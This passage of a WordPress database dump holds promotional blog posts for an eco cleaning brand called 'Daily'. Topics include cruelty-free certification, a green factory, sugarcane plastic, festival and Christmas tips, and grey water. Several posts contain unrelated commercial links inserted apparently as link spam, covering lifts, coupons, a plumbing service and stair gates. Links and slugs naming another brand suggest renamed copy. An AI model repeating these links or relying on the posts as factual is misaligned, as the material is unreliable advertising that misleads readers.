actually mean you ask?','publish','open','open','','something-to-think-about-when-cleaning-the-toilet','','http://www.dailyjolly.co.uk/green-production-values\nhttp://peaawards.co.uk/celebrate-a-green-living','2017-10-23 10:10:56','2017-10-23 10:10:56','',0,'http://www.dailyjolly.co.uk/something-to-think-about-when-cleaning-the-toilet',0,'post','',0),(34,1,'2017-10-17 08:30:53','2017-10-17 08:30:53','<h2 class=\"title\">Cleanercise: You can workout whilst doing the housework!</h2>\r\nIf you\'re struggling to find time to hit the gym and worried that those household chores are mounting up, we\'ve come up with an ingenious way to combine the two: Cleanercising.\r\n\r\nFrankie, Dancing On Ice\'s star skater, fitness fanatic and Daily lover has accepted our challenge to turn everyday cleaning tasks into thigh-trimming, tum-toning, energy-giving exercise routines.\r\n\r\nWatch Our Cleanercise routine to find out how you can feel good (and healthy) while you clean.\r\n<h3>Our Top Cleanercise Tips</h3>\r\n\"I am always looking for new ways to fit everything into a busy day. By Cleanercising, you stay healthy and your home stays sparkling. Here are just a few of the effective exercises that can be added to household chores.\r\n<h3>Maximum mopping</h3>\r\nDid you know you can burn 300 calories an hour when mopping the floor? Add in some full body twists by mopping side to side, plus forward leg lunges when mopping forwards and backwards, and you\'ll be working your tummy, legs and arms even more. You\'ll feel the benefits in no time!\r\n\r\n&nbsp;\r\n<h3>Worktop and window work-out</h3>\r\nClean worktops and windows with a mix of small, fast circular movements and long over-arm sweeps. A full body workout can be achieved, honing the core muscles, tightening the triceps, shoulders and back. Switch hands every 5 to 10 times to work both sides evenly.\r\n\r\n&nbsp;\r\n<h3>Bicep bottle</h3>\r\nThe gym isn\'t the only place to tone up; your home contains some great workout props. Fill two empty Daily bottles with water and use them as weights to tone your arms - starting with eight bicep curls followed by eight triceps dips. End with a resistance exercise; raise the bottle out in front of you at a 90 degree angle and hold them there for as long as you possibly can - a great one for strengthening your arms (not to mention your determination!)\r\n\r\n&nbsp;\r\n<h3>Wiggle and stir</h3>\r\nWiggle your hips and have a spin when cooking up a storm in the kitchen - in the time it takes for you to whip up a delicious and healthy main course you\'ll have burned an additional 200 calories. And instead of sitting down while the veg is cooking why not practice your dance moves? You\'ll love it and your body will too!\r\n\r\n&nbsp;\r\n<h3>Wash and glow</h3>\r\nWork out while you wash up with some glute-firming rear leg lifts. Turn up the radio and, using the sink for balance, raise your leg behind you whilst holding your stomach in. Complete eight on the right leg before changing to the left leg, and repeat until your favourite song has finished.”','Cleanercise: You can workout whilst doing the housework!','','publish','open','open','','cleanercise-workout-to-housework','','','2017-10-17 08:39:33','2017-10-17 08:39:33','',0,'http://www.dailyjolly.co.uk/cleanercise-workout-to-housework',0,'post','',0),(35,1,'2017-10-17 08:30:53','2017-10-17 08:30:53','<h2 class=\"title\">A seal of approval for our love of furry things</h2>\r\nAnimals - we love them whether they\'re big, small, fluffy, furry, wriggly, cute or even a bit funny looking. That\'s why ever since Daily began, we\'ve always been against animal testing for the ingredients in our products.\r\n\r\nSadly, there aren\'t yet any bans on animal testing for cleaning products or their ingredients. A handful of countries have outlawed animal testing for cosmetics and personal products, but there\'s still a long way to go.\r\n\r\nOf course, we all need to know that our products are safe for our homes and families. Europe\'s REACH (Registration, Evaluation, Authorisation and Restriction of Chemicals) regulation helps with this by insisting that all chemicals are registered and assessed for safety, with animals used for testing only as a last resort. We believe that animals shouldn\'t be used at all: using non-animal tests and existing ingredients that have already been proved to be fine is the way to do it.\r\n<div class=\"highlight\">\r\n\r\nWe\'ve worked hard to gain the Leaping Bunny stamp... for the benefit of furry, funny creatures everywhere.\r\n\r\n</div>\r\n<h3>Making it official</h3>\r\nAfter lots of requests, we set out to make our cruelty free status official to reassure Daily lovers that no animals were harmed for the sake of the washing up and other chores. A huge part of the process was making sure we could work with the Cruelty Free International in their quest to get non-animal testing accepted and approved by the industry. Once that was all in place, we were then able to set our own cut-off date for ingredient testing. And here we are. In August this year, all our household and laundry products earned the Leaping Bunny stamp of approval. We\'re happy as rabbits.\r\n\r\nThe Leaping Bunny is the trusted mark of the only international no-animal-testing certification. It\'s managed by a network of animal protection organisations worldwide, including Cruelty Free International, who are all dedicated to ending the use of animals in product testing completely. Hooray.\r\n\r\nTo earn the Leaping Bunny mark, Daily needed to meet the strict criteria of the Humane Household Products Standard. This means that as well as not using animal testing for Daily, our ingredients must be animal test free too. We passed our audit with flying colours and are proud to be adding the lovely little stamp to all our household products. You\'ll see it sometime soon, if you haven\'t already.\r\n<h3>A happier future for bunnies everywhere</h3>\r\nWhen it comes to new ingredients, we\'re committed to using alternative tests that guarantee safety for you and your family without harming anything else. We\'ve worked hard to gain the Leaping Bunny stamp, and we\'ll continue to invest our time, energy and hard cash into the ongoing efforts for the benefit of furry, funny creatures everywhere.\r\n\r\nBoth Daily and the suppliers of our ingredients will continue to have regular checks and audits to make sure we\'re all sticking to the required standards. We\'re also busy working towards certification for all our personal care and commercial products. It\'s a big job but one we\'re more than happy to do.\r\n<h3>Have your say</h3>\r\nWe\'re really excited about joining the Leaping Bunny programme.','Cleaning products that are cruelty free!',' have always been against animal testing for our ingredients, and now we are part of Cruelty Free International\'s official Leaping Bunny programme.','publish','open','open','','cleaning-products-that-are-cruelty-free','','','2017-10-17 08:40:22','2017-10-17 08:40:22','',0,'http://www.dailyjolly.co.uk/cruelty-free-cleaning-products-the-splash-ecover',0,'post','',0),(36,1,'2017-10-17 08:30:53','2017-10-17 08:30:53','<h2 class=\"title\">Facts about many factories</h2>\r\nHere at Daily, the methods we use to make our ecologically friendly cleaning products are as green as the products themselves. From our factory roof to the energy we use to run it, we do our best to limit environmental impact.\r\n\r\nTake our energy supply, for starters. The Daily factory operates entirely on green electricity - the type produced by wind generators, tidal generators and other natural sources. We know how valuable energy is, so we try to make the most of it by choosing energy efficient lighting, for example, and then only using it when needed.\r\n\r\nAlthough the machinery we use is standard in the industry (be it the kinds of lifts and ladders you see on <a href=\"https://www.platformsandladders.com/lifts/\">https://www.platformsandladders.com/lifts/</a> that are used across several factories), we keep our energy and water consumption down by choosing low-speed appliances that can multi-task and don\'t require water to clean them. For example, the motors on our mixing machines can mix 25 tonnes of Daily liquid while consuming no more electricity than a few flat irons. And we have a squeezy gadget that\'s so efficient at getting every last drop of product out of the pipes, they don\'t need to be rinsed through. Obviously, our <a href=\"https://k2automation.com/\">machine parts</a> need replacing occasionally, but when a part does fail we make sure the replacement is of top quality, ensuring our machines last and last. \r\n\r\nIt probably goes without saying that we hate waste, so we\'re big on recycling. We keep the amount of packaging used in our products to a minimum, and make sure whatever cardboard or plastic we do use can be recycled, re-used or re-filled. It\'s an ongoing process of improvement; in fact, we\'ve recently developed a new kind of green plastic we like to call <a href=\"../../articles/fantastic-plantastic/\">\'Plant-astic\'</a> that\'s 100% renewable, reusable and recyclable - and made from sugarcane. We\'re switching over to mass production very soon.\r\n\r\nBut it\'s the factory itself that we\'re most proud of. Cleverly designed to follow the movement of the sun from east to west, we work under the maximum amount of natural daylight - good for the power supply and good for the soul! The factory\'s frame is built from pine rather than more precious timbers and the walls are constructed using Poro+ bricks. Poro+ bricks are made from clay, wood pulp and coal fine. They require less energy to bake, yet they\'re light, porous and insulate well. With the help of <a href=\"https://www.tractel.com/safetygate/industrial-safety-gates/\">egress stair gate</a>, the factory could be well protected.\r\n\r\nAnd finally, we have our very own green, living roof. Covered in thick, spongy Sedum, or \'Thunder Beard\' as it\'s known, it\'s not just nice to look at; it also gives great insulation all year round. So effective is our Sedum roof that we don\'t need heating or air conditioning - the temperature never drops below 4В C and never rises above 26В C.\r\n\r\nYou see, we don\'t just love our factory because it\'s pretty. We\'ve been working for years to produce powerful, effective cleaning products that have minimal impact on the environment, and it\'s only right that the same rule should apply to our production methods. But rest assured, we don\'t expect you to save your bath water, live in a windmill or grow potatoes on your roof; just by choosing Daily, you\'re doing your bit, too.','Do you expect all factories to be ecological?','','publish','open','open','','our-ecological-factory','','','2017-10-17 08:41:03','2017-10-17 08:41:03','',0,'http://www.dailyjolly.co.uk/our-ecological-factory',0,'post','',0),(37,1,'2017-10-17 08:30:53','2017-10-17 08:30:53','<h2 class=\"title\">What\'s new in the plant world?</h2>\r\nAt Daily, we\'ve always been ones to do things a little differently. And although we\'re anything but superficial, our latest breakthrough proves it\'s not just what\'s on the inside that counts...\r\n\r\nLike you, we recognise that plastic packaging is a major problem - not only does it clutter up your home, the plastic is made from crude oil. It\'s an increasingly scarce resource and we all know the problems associated with oil spills and pollution... So for three years now we\'ve been working to find a new, alternative packaging solution that starts to address some of these issues. We\'re very proud of the results.\r\n<div class=\"highlight3\">\r\n\r\n<strong>The Message in our Bottle</strong>\r\nDiscover how our pledge is helping to clean up the planet one bottle at a time.\r\n<a href=\"../../message-in-our-bottle/\">Find out how</a>\r\n\r\n</div>\r\nBy harnessing the power of nature and applying a little clever science, we\'ve implemented an innovative new PolyEthylene (PE) - a green plastic we call Plant-astic that\'s 100% renewable, reusable and recyclable - and made from sugarcane! We\'re so pleased with it that we\'re making our bottles 100% Plant-astic. It\'s also good to see that some other well-known brands are now thinking of following our lead - even if they initially only intend using up to 30% renewable plastic.\r\n\r\nManufacturing our new Plant-astic is unbelievably simple. Sugarcane is harvested to produce sugar, which is then fermented and distilled to produce ethanol. This ethanol is dehydrated to create ethylene, which is polymerized into Plant-astic. That\'s really all there is to it.\r\n\r\nPlant-astic is impressive in so many other ways. Because the sugarcane is grown and harvested in harmony with its natural environment, the nearby Amazonian rainforests remain unaffected. The entire production process is so efficient that we need only harvest 15 hectares of land to make a year\'s worth of Daily packaging.\r\n\r\nWe\'re in the process of switching all of our packaging over, and as of April 2011, our bottles are being made from fantastic new Plant-astic. Of course, what\'s on the inside is just as important as ever, so you can be sure that every bit of new packaging contains cleaning products that are incredibly efficient and supremely powerful.','What\'s new in the plant world?','','publish','open','open','','fantastic-plant-astic','','','2017-10-17 08:41:55','2017-10-17 08:41:55','',0,'http://www.dailyjolly.co.uk/fantastic-plant-astic',0,'post','',0),(38,1,'2017-10-17 08:30:53','2017-10-17 08:30:53','<h2 class=\"title\">Are you going to a festival in the summer of 2018? Read our tips today!</h2>\r\nIf you\'re lucky enough to be heading to one of this year\'s fabulous festivals, we\'ve got some great hints and tips for the practical side of things. The fun part of it is up to you!\r\n<ol>\r\n 	<li><strong>Pack for the arrival trudge</strong> - there are some obvious must-haves like a tent, sleeping bag, clothes, good shoes, earplugs etc. But keeping it streamlined will make lugging your gear that bit easier. If you forget something, you can probably buy it there. And valuables? If you don\'t want to lose it, leave it at home. <a href=\"http://www.dailyjolly.co.uk/travel-hints-and-tips\">Read our top travel tips.</a></li>\r\n 	<li><strong>Work at the festival to save some money! </strong>- Festivals always need staff and volunteers to keep everything running - and you get a free ticket to the festival! You can apply directly or apply to event staffing agencies for various roles like checking tickets and working at the bar. <a href=\"https://www.streetpr.co.uk/events/bar-staff\" target=\"_blank\" rel=\"noopener\">Click here for bar work.</a></li>\r\n 	<li><strong>TAKE. YOUR. WELLIES.</strong> - the forecast may be glorious but that hot, steamy day can turn into a thundery, wet night. Wellies are worth their weight in gold when the rain hits. At least make sure they\'re in the car, even if you don\'t carry them all the way in.</li>\r\n 	<li><strong>Remember where you parked</strong> - write it, share it, repeat it, chant it, do whatever you can to remember it! Searching for your motor in amongst 50,000 others can take a long, long time. <a href=\"http://www.carparkstars.uk/\" target=\"_blank\" rel=\"noopener\">Click here for parking</a>.</li>\r\n 	<li><strong>Camp wisely</strong> - first, find a good spot. Not at the bottom of a hill (muddy ditch alert) and not next to the loos, unless you really don\'t mind festival smells and doors banging all night long. Once you\'ve pitched your tent, look for a big, obvious landmark so that you can always find your way back. If you don\'t fancy camping, <a href=\"http://annandale-hotel.co.uk/\" target=\"_blank\" rel=\"noopener\">book into a hotel!</a></li>\r\n 	<li><strong>Always carry a torch</strong> - your little morning walk could turn into an all day adventure. Keep a torch in your bag so that you\'ve always got a way to shine your path back to base.</li>\r\n 	<li><strong>Pick up your litter</strong> - once the fun\'s over, festival sites are strewn with all kinds of rubbish that can harm animals, big and small. For a cleaner festival and a sparkly clear conscience, pick it all up and put it in the bin.</li>\r\n 	<li><strong>Have a plan to stay safe</strong> - festivals are big and busy. Try to get your bearings, carry a map and have a meeting point set up in case anyone gets lost. If you have kiddos in your group, a wristband with your details on it can be great peace of mind.</li>\r\n 	<li><strong>Find your shower power</strong> - most festivals have great facilities, often with long queues. Pick a time when everyone else is asleep or busy watching the biggest bands and you might just walk right in. Our <a href=\"http://www.ecoverdirect.com/tags/mizu.aspx?tag=Mizu\" target=\"_blank\" rel=\"noopener\">Mizu body care range</a> is a great choice for feeling fresh again. Find out more about <a href=\"http://www.dailyjolly.co.uk/ecover-products-contain-no-nasties\">eco-friendly products.</a></li>\r\n 	<li><strong>Go with the flow</strong> - with so many bands and acts to see, it\'s easy to end up racing all over the place. Our festival pros recommend choosing one or two must-sees for the day, and letting the festival vibe carry you the rest of the way.</li>\r\n 	<li><strong>Try something new</strong> - Lebanese food, reflexology, hat making, laughter workshops, festivals are the place to experience all things weird, wild and wonderful. You never know, you might find your new passion in life!</li>\r\n</ol>','Are you going to a festival in the summer of 2018? Read our tips today!','\'s summer festival hints and tips - our survival guide for a summer of fun.','publish','open','open','','are-you-going-to-a-festival-in-the-summer-of-2018-read-our-tips-today','','\nhttp://www.dailyjolly.co.uk/ecover-products-contain-no-nasties','2018-03-21 10:00:47','2018-03-21 10:00:47','',0,'http://www.dailyjolly.co.uk/festival-hints-and-tips-from-ecover',0,'post','',0),(39,1,'2017-10-17 08:30:53','2017-10-17 08:30:53','<h2 class=\"title\">The truth about bubbles and washing up</h2>\r\nMany of us see bubbles and think \'clean\'; we believe the bubblier the better, that foamier equals effectiveness and super-suds mean super-clean dishes.\r\n\r\nBut it ain\'t necessarily so. There\'s an awful lot of froth surrounding the bubbliness of washing up liquids... why not find out more...?\r\n<h3>The facts about washing up liquids</h3>\r\nSo how does a washing up liquid work? It\'s all down to surfactants; they\'re the basic ingredients that get the job done. Some are better at cleaning than foaming, while others are better at foaming than cleaning. More often than not, when you see really <i>bubbly</i> bubbles it\'s because the manufacturer has chosen to add less effective but foamier surfactants to make you think it\'s doing a better job.\r\n\r\nBut don\'t be fooled; whilst it\'s true that in times past extra suds reassured consumers that the products they were buying packed cleaning punch, times have changed. We no longer need the amount of froth to summon up a streak-free sparkle. Clever science has given us surfactants that clean more effectively than ever, without producing mountains of foam.\r\n\r\nIt\'s a bit like baking a cake; if the recipe called for plain flour, you wouldn\'t bother adding self-raising. Bubbles are simply a superficial side effect. What they signify is wasted product.\r\n<h3>An important question of source</h3>\r\nAt Daily, we adopt a strict \'no nasties\' policy. The surfactants we put in our products come from natural, plant-based sources, rather than petrochemical (oil) sources. Ensuring renewability and supporting our sustainability ethos.\r\n\r\nOur plant-based surfactants concentrate on cleaning instead of working themselves up into a pointless lather.\r\n<h3>Say no to superficial suds</h3>\r\nIt\'s time to dispel the myth of \'the bubblier, the better\'. Now you know, tell your friends; there\'s no need for extra bubbling surfactants, especially those made from petrochemicals. One squirt of Daily is as effective at <a href=\"http://www.ecoverdirect.com/departments/sparkling-dishes.aspx?deptid=SD\" target=\"_blank\" rel=\"noopener\">cleaning a sink full of cups</a> and crockery as the rest, but with less bubbles.\r\n\r\nDaily <i>shouldn\'t</i> bubble, froth or foam too much. It\'s just not in our nature.\r\n\r\nWe believe these latest, lower-foam formulas are our most effective yet, but we\'re always looking for ways to make our products even better. As ever, you\'ll be the first to know about our next big breakthrough.','What are foam boosters and why don\'t we recommend them?','Too many bubbles when washing up the dishes is not necessarily a good thing. Find out more about foam boosters and their role in your washing up bowl.','publish','open','open','','what-are-foam-boosters-and-why-dont-we-recommend-them','','','2017-10-17 08:43:16','2017-10-17 08:43:16','',0,'http://www.dailyjolly.co.uk/why-we-dont-use-foam-boosters',0,'post','',0),(40,1,'2017-10-17 08:30:52','2017-10-17 08:30:52','<h2 class=\"title\">Good Housekeeping Institute Approved</h2>\r\nWe\'re proud to say that we have been given the big thumbs up <strong>for good house keeping</strong>, testament that our products really do pack a punch especially when it comes to tackling the Spring Clean!\r\n\r\n&nbsp;\r\n\r\nThe Good Housekeeping<i> </i>is the backbone of their magazine \'Good Housekeeping Magazine\' which we all know and enjoy and over a century has established the reputation that consumers know and trust today.\r\n\r\nGH exhaustively test consumer goods, so they can wholeheartedly provide invaluable and unbiased \'GH Approved\' status which is just what they\'ve done for our Daily Non-Bio Washing Powder, Non-Bio Concentrated Laundry Liquid, Multi-Surface Cleaner and All Purpose Cleaner.\r\n\r\nSo you can be <strong>100%</strong> sure that our products will get the job done, from wiping down surfaces with the versatile Daily Multi-Surface Cleaner to getting your tablecloth clean and fresh as a spring daisy with Daily Concentrated Laundry Liquid.\r\n\r\n<strong>We\'re not ones to blow our own trumpet, but with GHI\'s near on 100 years\' experience of scrubbing, scouring, washing and wiping, they should know!</strong>','Good Housekeeping','','publish','open','open','','good-housekeeping','','','2017-10-17 08:47:26','2017-10-17 08:47:26','',0,'http://www.dailyjolly.co.uk/good-housekeeping-institute-approved',0,'post','',0),(41,1,'2017-10-17 08:30:52','2017-10-17 08:30:52','<h2></h2>\r\n<h2 class=\"title\">Have yourself a merry green Christmas...</h2>\r\nLast-minute Christmas shopping, writing cards, wrapping presents, cleaning the house... There are so many tasks to complete in the run-up to Christmas. There\'s so much to shop for as well, good thing there are coupons like <a href=\"https://www.raise.com/coupons/nike\">https://www.raise.com/coupons/nike</a>\r\nwhich can help shave some money off of present buying. However, shaving off waste and carbon emissions is something often overlooked in the big Christmas shop. The season is often so hectic that trying to be \'green\' at the same time is easy to forget.\r\n\r\nThat\'s why Daily has come up with top ten tips on how to inject a little \'green\' into your Christmas without breaking the bank or spoiling any of the festive fun!\r\n<ol>\r\n 	<li>Wear and Care this Christmas and add some eco to your festive wardrobe. Why not rock the office Christmas party eco-style this festive season? Visit <a href=\"http://www.londonfashionweek.co.uk/estethica\" target=\"_blank\" rel=\"nofollow noopener\">www.londonfashionweek.co.uk</a> for a list of eco fashion labels or check out our favourite Ada Zanditon\'s Autumn Winter collection. Also, Daily\'s laundry range means that you can wear high end fashion and care for it and the world around at the same time - perfect for the busy festive season</li>\r\n 	<li>Buying a real tree? Visit the <a href=\"http://www.fsc-uk.org/\" target=\"_blank\" rel=\"nofollow noopener\">Forest Stewardship Council</a> website to make sure your precious pine has been farmed sustainably.</li>\r\n 	<li>All of Daily\'s range is now made from Plant-astic - a sustainable plastic made from sugar cane. This means that if you choose Daily this Christmas to deal with your dirty plates, wash your best table linen, and keep your home clean, not only will your home be free from chemical nasties but also the packaging you\'re choosing is better for the world around you too! And it just got easier - <a href=\"http://www.ecoverdirect.com/\" target=\"_blank\" rel=\"noopener\">Daily\'s online shop</a> means that you don\'t have to worry about heavy shopping bags either.</li>\r\n 	<li>Use last year\'s Christmas cards to make this year\'s gift tags - cut out the pictures and thread through some cotton - hey presto, recycling at its best. Don\'t forget to save this year\'s cards to use in 2018!</li>\r\n 	<li>Treat your guests to some eco luxury - pop some Daily Hand Wash in the bathroom and try Daily Room Fragrance to keep your house smelling fresh. By the way, before you put some nice smelling air freshners in your bathroom, check whether you have a broken faucet or a clogged toilet. In case you find your bathroom fixture and fittings in poor condition, then consider checking out websites like  <a href=\"https://thecomfortdoctors.com/plumbing-services-archbald/\">https://thecomfortdoctors.com/plumbing-services-archbald/</a> to find technicians who can fix them before your guests arrive. </li>\r\n 	<li>e-Christmas cards - why not try Facebook, Twitter or email rather than snail mail to send your seasons greetings?</li>\r\n 	<li>Banish those stains - gravy and cranberry sauce stains are rife on Christmas day. Remove them with ease Daily\'s Stain Remover - so effective it\'s been awarded a Which? Best Buy</li>\r\n 	<li>Travel together - try car sharing with friends and family or taking the bus to the shops to do your Christmas shopping</li>\r\n 	<li>Once you\'ve filled up on turkey, Yorkshire puddings and brussel sprouts, wash the dishes with Daily Washing Up Liquid - you can even use your left over dish water to feed the Christmas tree!</li>\r\n 	<li>Recycled wrapping paper is a really easy way to score \'green\' points at Christmas and doesn\'t cost the earth. Try the <a href=\"http://www.ethicalsuperstore.com/\" target=\"_blank\" rel=\"nofollow noopener\">selection at the Ethical Superstore</a>.</li>\r\n</ol>','It\'s almost Christmas! Here\'s how you can stay green while shopping','','publish','open','open','','green-christmas-shopping','','','2017-10-17 08:46:01','2017-10-17 08:46:01','',0,'http://www.dailyjolly.co.uk/green-christmas-shopping',0,'post','',0),(42,1,'2017-10-17 08:30:52','2017-10-17 08:30:52','<h2 class=\"title\">Green Production Values - Q & A</h2>\r\n<strong>Why make a TV ad?</strong>\r\n\r\nLots of people tell us that they have heard of Daily, but don\'t know what is different about it. By advertising on TV we can share our messages with a new mix of people who may not have thought about buying our products before.\r\n\r\nAt the moment 1.2 million households use Daily, but we want more! The more people try Daily, the more we help the environment and reduce chemicals in homes.\r\n\r\n<strong>Where else can we see Daily?</strong>\r\n\r\nNot everyone watches TV so we\'re promoting Daily in a number of ways different ways; magazine ads, in-store communications, online, social media, and at key events throughout the UK.\r\n\r\n<strong>Where was the new Daily Feel Good Cleaning ad filmed?</strong>\r\n\r\nWe filmed in Cape Town, South Africa (lucky us!) for a number of reasons.\r\n\r\nThe Cape Town area has lots of locations that look and feel like the UK. We found local actors to star in our ad and there were some fantastic production companies that matched our sustainable values nearby. We filmed in November, so perhaps the most important reason for the choice was that we were guaranteed 14 hours of natural light per day. These longer, lighter days meant we could do a lot more filming over a shorter number of days thus reducing our environmental impact (as well as reducing our costs). Had we filmed in the UK filming would have taken weeks rather than days!\r\n\r\n<strong>Doesn\'t travelling to South Africa damage the environment?</strong>\r\n\r\nAlthough South Africa does seem like a long way to go, we did everything possible to ensure we had minimum impact on the environment:\r\n<ul>\r\n 	<li>We used Cape Town based production teams and actors, so only 7 out of 80+ people involved with the shoot had to fly from the UK; 95% of the crew were local.</li>\r\n 	<li>The production company we hired had strong eco credentials; they have their own recycling trailers and bins, and as with all their shoots endeavoured to have as little impact as possible in every location. All waste was recycled, food waste was composted to feed the garden at the production company offices, and even the loos were solar powered!</li>\r\n 	<li>The caterers we used grow as much food as they can on their own land, watered with rain water and powered by the sun. Plus, they plant a tree for every five jobs they create.</li>\r\n 	<li>Any leftover props and clothing used in the shoot were donated to the Ubunye Educare Centre, which works with disadvantaged children in the Cape Town area to develop their social and learning skills before school age.</li>\r\n 	<li>We neutralised the carbon created through both the flights that we took and the shoot itself by contributing to two projects run by our friends at ClimateCare. The first project aims to reduce emissions and provide over four million people in rural Kenya with clean, safe drinking water. The second helps fund a forest protection project near Mombasa that empowers the local communities to be economically independent without the need to cut down the natural forest. If your company is interested in neutralising their carbon footprint, then they can take a look at the <a href=\"https://www.cooleffect.org/how-companies-can-reduce-carbon-footprint\">Cool Effect</a> website.</li>\r\n 	<li>We stayed in a lovely family-run eco hotel that has won a number of responsible tourism awards for its approach to the environment and social development. They take conservation seriously, instill a philosophy of sustainability, and save water and energy wherever they can.</li>\r\n 	<li>Where possible we sourced and used props and clothing from responsible sources, including our friends <a href=\"../../friends/boden/\">Boden</a>, and the models also wore some of their own clothes.</li>\r\n 	<li>We shipped over as little product as possible to reduce weight and ensured these products appeared in as many scenes as we could. Obviously we left the products in South Africa so they can also Feel Good Cleaning there!</li>\r\n</ul>\r\n<strong>Did you meet any Daily lovers?</strong>\r\n\r\nWe were over the moon to discover that both the director Karen Lamond and voiceover artist Daisy Beaumont were already big Daily fans. Karen kindly gave up some of her time for free to work on the shoot and Daisy has always spread the word about our products to her friends and family so couldn\'t wait for the opportunity to do it on national TV!\r\n\r\n<strong>Were any children or animals harmed in the making of the ad?</strong>\r\n\r\nThe advert features plenty of children and an adorable cat named Tiggy. We stuck to the very tight rules and regulations surrounding the welfare of children and animals on set - not because we had to, but because we love children and animals, even having worked with them!\r\n\r\nThe children loved the shoot, and we think it shows. Of course, we made sure they only worked the regulated hours, their guardians were always at hand and when they were not needed on set a child-minder was on hand to keep them entertained.\r\n\r\nOur feline friend Tiggy shares her home with seven rowdy canines and she even brought one of them, Watson, along for the day. According to her owner \'she keeps them all under control\' so she seemed unfazed by the noise, chaos and action in the shoot... but we kept her handler and a vet nearby just in case.\r\n\r\n<strong>How did Daily stay true to its values?</strong>\r\n\r\nDaily have never been on TV like this before and we wanted to make sure we remained inclusive and represented our consumers equally and fairly. We hope that you can recognise a little bit of yourself in the ad.\r\n\r\nWe filmed the ad in real homes, with real people; we didn\'t want any TV trickery (airbrushing and fakery is not our style). After all, we pride ourselves on our honest and transparent approach.\r\n\r\n<strong>How are we including Daily users in 2018?</strong>\r\n\r\nThis year we will be hosting our very own Feel Good Events at some major festivals and events. As well as some great dancers showing off and teaching the moves from our TV ad, we\'ll have our very own electric vehicle touring around sites and handing out samples, so you can experience a Feel Good Clean once you get home.','What are Green Production Values?','','publish','open','open','','green-production-values','','','2017-10-17 08:45:00','2017-10-17 08:45:00','',0,'http://www.dailyjolly.co.uk/green-production-values',0,'post','',0),(43,1,'2017-10-17 08:30:52','2017-10-17 08:30:52','<h1 class=\"title-new\">Grey Water</h1>\r\n<h3>No Need to Pull the Plug!</h3>\r\n<strong>Did you know used Daily washing up water - or \'grey water\' - can be put to great use once the dishes are sparkling clean?</strong>\r\n\r\nYes, that\'s right- you can water your prized sunflowers, or your latest crop of fruit and veg- or simply keep the lawn looking lovely with your grey water.\r\n\r\nOur <a href=\"../../products/washing-up/washing-up-liquids/\">Washing up Liquids</a> contain No Nasties such as phosphates and we\'ve developed our very own eco-surfactants for powerful and effective cleaning- which means the grey water from our products won\'t have a negative effect on your greenery.\r\n\r\nIt\'s advisable to let the water settle for no more than a few days first so the plant and mineral based ingredients can start to biodegrade. In hot temperatures it only needs to settle for a day- but after that water away!\r\n\r\nWe are passionate about creating a closed loop in sustainability and making sure the impact our products have on the environment is as minimal as possible, from the <a href=\"../../articles/factory-facts/\">Daily Ecological factory</a>, to your family home - and beyond.\r\n<div class=\"clear\"></div>\r\n<p class=\"em2\">Feel Good in the knowledge that you can recycle your grey water back in to nature and keep your <a href=\"../../feel-good/ecover-garden/\">garden</a> looking healthy and clean - just like the dishes.</p>\r\n<p class=\"em1\">Why not try our washing-up liquid</p>\r\n<p class=\"em2\"><a href=\"http://www.ecoverdirect.com/products/washing-up-liquid-500ml/ewash500ml.aspx?productid=ewash500ml\" target=\"_blank\" rel=\"noopener\">4 fresh fragrances to choose from &gt;</a></p>','What is grey water and why can you use it?','Used  washing up water, can be put to use once the dishes are sparkling clean? Water your prized sunflowers, or your latest crop of fruit and veg.','publish','open','open','','grey-water','','','2017-10-17 08:44:03','2017-10-17 08:44:03','',0,'http://www.dailyjolly.co.uk/grey-water',0,'post','',0),(44,1,'2017-10-17 08:30:51','2017-10-17 08:30:51','<h2 class=\"title\">The UK hosepipe ban</h2>\r\nHere at Daily, it\'s our mission to create <a href=\"http://www.ecoverdirect.com/\" target=\"_blank\" rel=\"noopener\">products that don\'t pollute</a> our rivers and oceans.\r\n\r\nWe admit it; we\'re just a little bit obsessed with water.\r\n\r\nSo we\'ve been paying close attention to the latest news of a hosepipe ban. Parts of the country are now prohibited from using hosepipes \'for recreational use\', which means no washing cars and windows, watering gardens or filling ponds and swimming pools with hosepipes. It comes after two dry winters have left reservoirs and rivers running low. Whilst few of us have the luxury of a swimming pool, most of us do enjoy our gardens - and for many it\'s this love of nature that has us reaching for more eco-friendly products like Daily.\r\n<div class=\"highlight2\">\r\n\r\n\"...1/2 million Olympic swimming pools worth of water would be safeguarded against pollution...\"\r\n\r\n</div>\r\nIf there\'s one thing the hosepipe ban proves it\'s that we each, as individuals, play a part in maintaining our country\'s and our planet\'s water supply.\r\n<h3>Using Daily can help</h3>\r\nAt Daily we think long and hard about the water we use, from its part in the production process to its role in your home. Whether or not you\'re in an area affected by the ban, by using Daily you\'ll be helping to prevent the wastage and pollution of the UK\'s water supply:\r\n<ul>\r\n 	<li>All Daily products are designed to have the minimum impact on aquatic life. The biodegradable ingredients we use break down once washed away. Many chemicals do not, like <a href=\"../../articles/optical-brighteners/\">optical brighteners</a> and the wrappers on liquitabs which linger in our water supply to the extent that they can affect the water we drink. So we simply refuse to use them.</li>\r\n 	<li>We pay close attention to the \'critical dilution volume\' - or how much water it takes to neutralise a product. For example, each dose of <a href=\"http://www.ecoverdirect.com/products/toilet-cleaner-pine-fresh/etoiletpf750ml.aspx?productid=etoiletpf750ml\" target=\"_blank\" rel=\"noopener\">Daily toilet cleaner</a> takes 20 times less water to neutralise than its nearest competitor.</li>\r\n 	<li>Some of our products, such as our <a href=\"http://www.ecoverdirect.com/products/multi-surface-spray-500ml/emsp500ml.aspx?productid=emsp500ml\" target=\"_blank\" rel=\"noopener\">Multi-Action Spray</a>, don\'t need any water to work their magic. Just squirt and wipe - no tap needed.</li>\r\n 	<li>You can re-use the \'grey water\' from your household cleaning tasks to water your garden. Simply leave your bucket outside for 2-3 days to allow the ingredients to break down, then slosh it where needed - whether it\'s your marigold bed or marrow patch.</li>\r\n</ul>\r\nOur water system may be global, but individual actions really do matter. If 5% of families in the UK switched to <a href=\"http://www.ecoverdirect.com/products/bio-concentrated-washing-powder/ebiopowd750.aspx?productid=ebiopowd750\" target=\"_blank\" rel=\"noopener\">Daily Biological washing powder</a> from a conventional product, in excess of 1/2 million Olympic swimming pools worth of water would be safeguarded against pollution in a year - all because our Bio powder takes 5000 less litres to neutralise per dose than a conventional Bio powder. It\'s a small step, but using Daily can make a big difference.\r\n<div class=\"highlight\"></div>\r\nWe\'d love to know what you think about the hosepipe ban. Will you be affected? Do you already take measures to conserve water in your home and garden? Why not sign-up to become an <a href=\"../../my-ecover/forums/topics/\">Agent of Change</a> and share your tips with other Daily lovers.\r\n\r\n ','The UK Hosepipe Ban','The south-east faces a hosepipe ban this summer. Find out how \'s water-friendly products can help you to maintain your garden during this 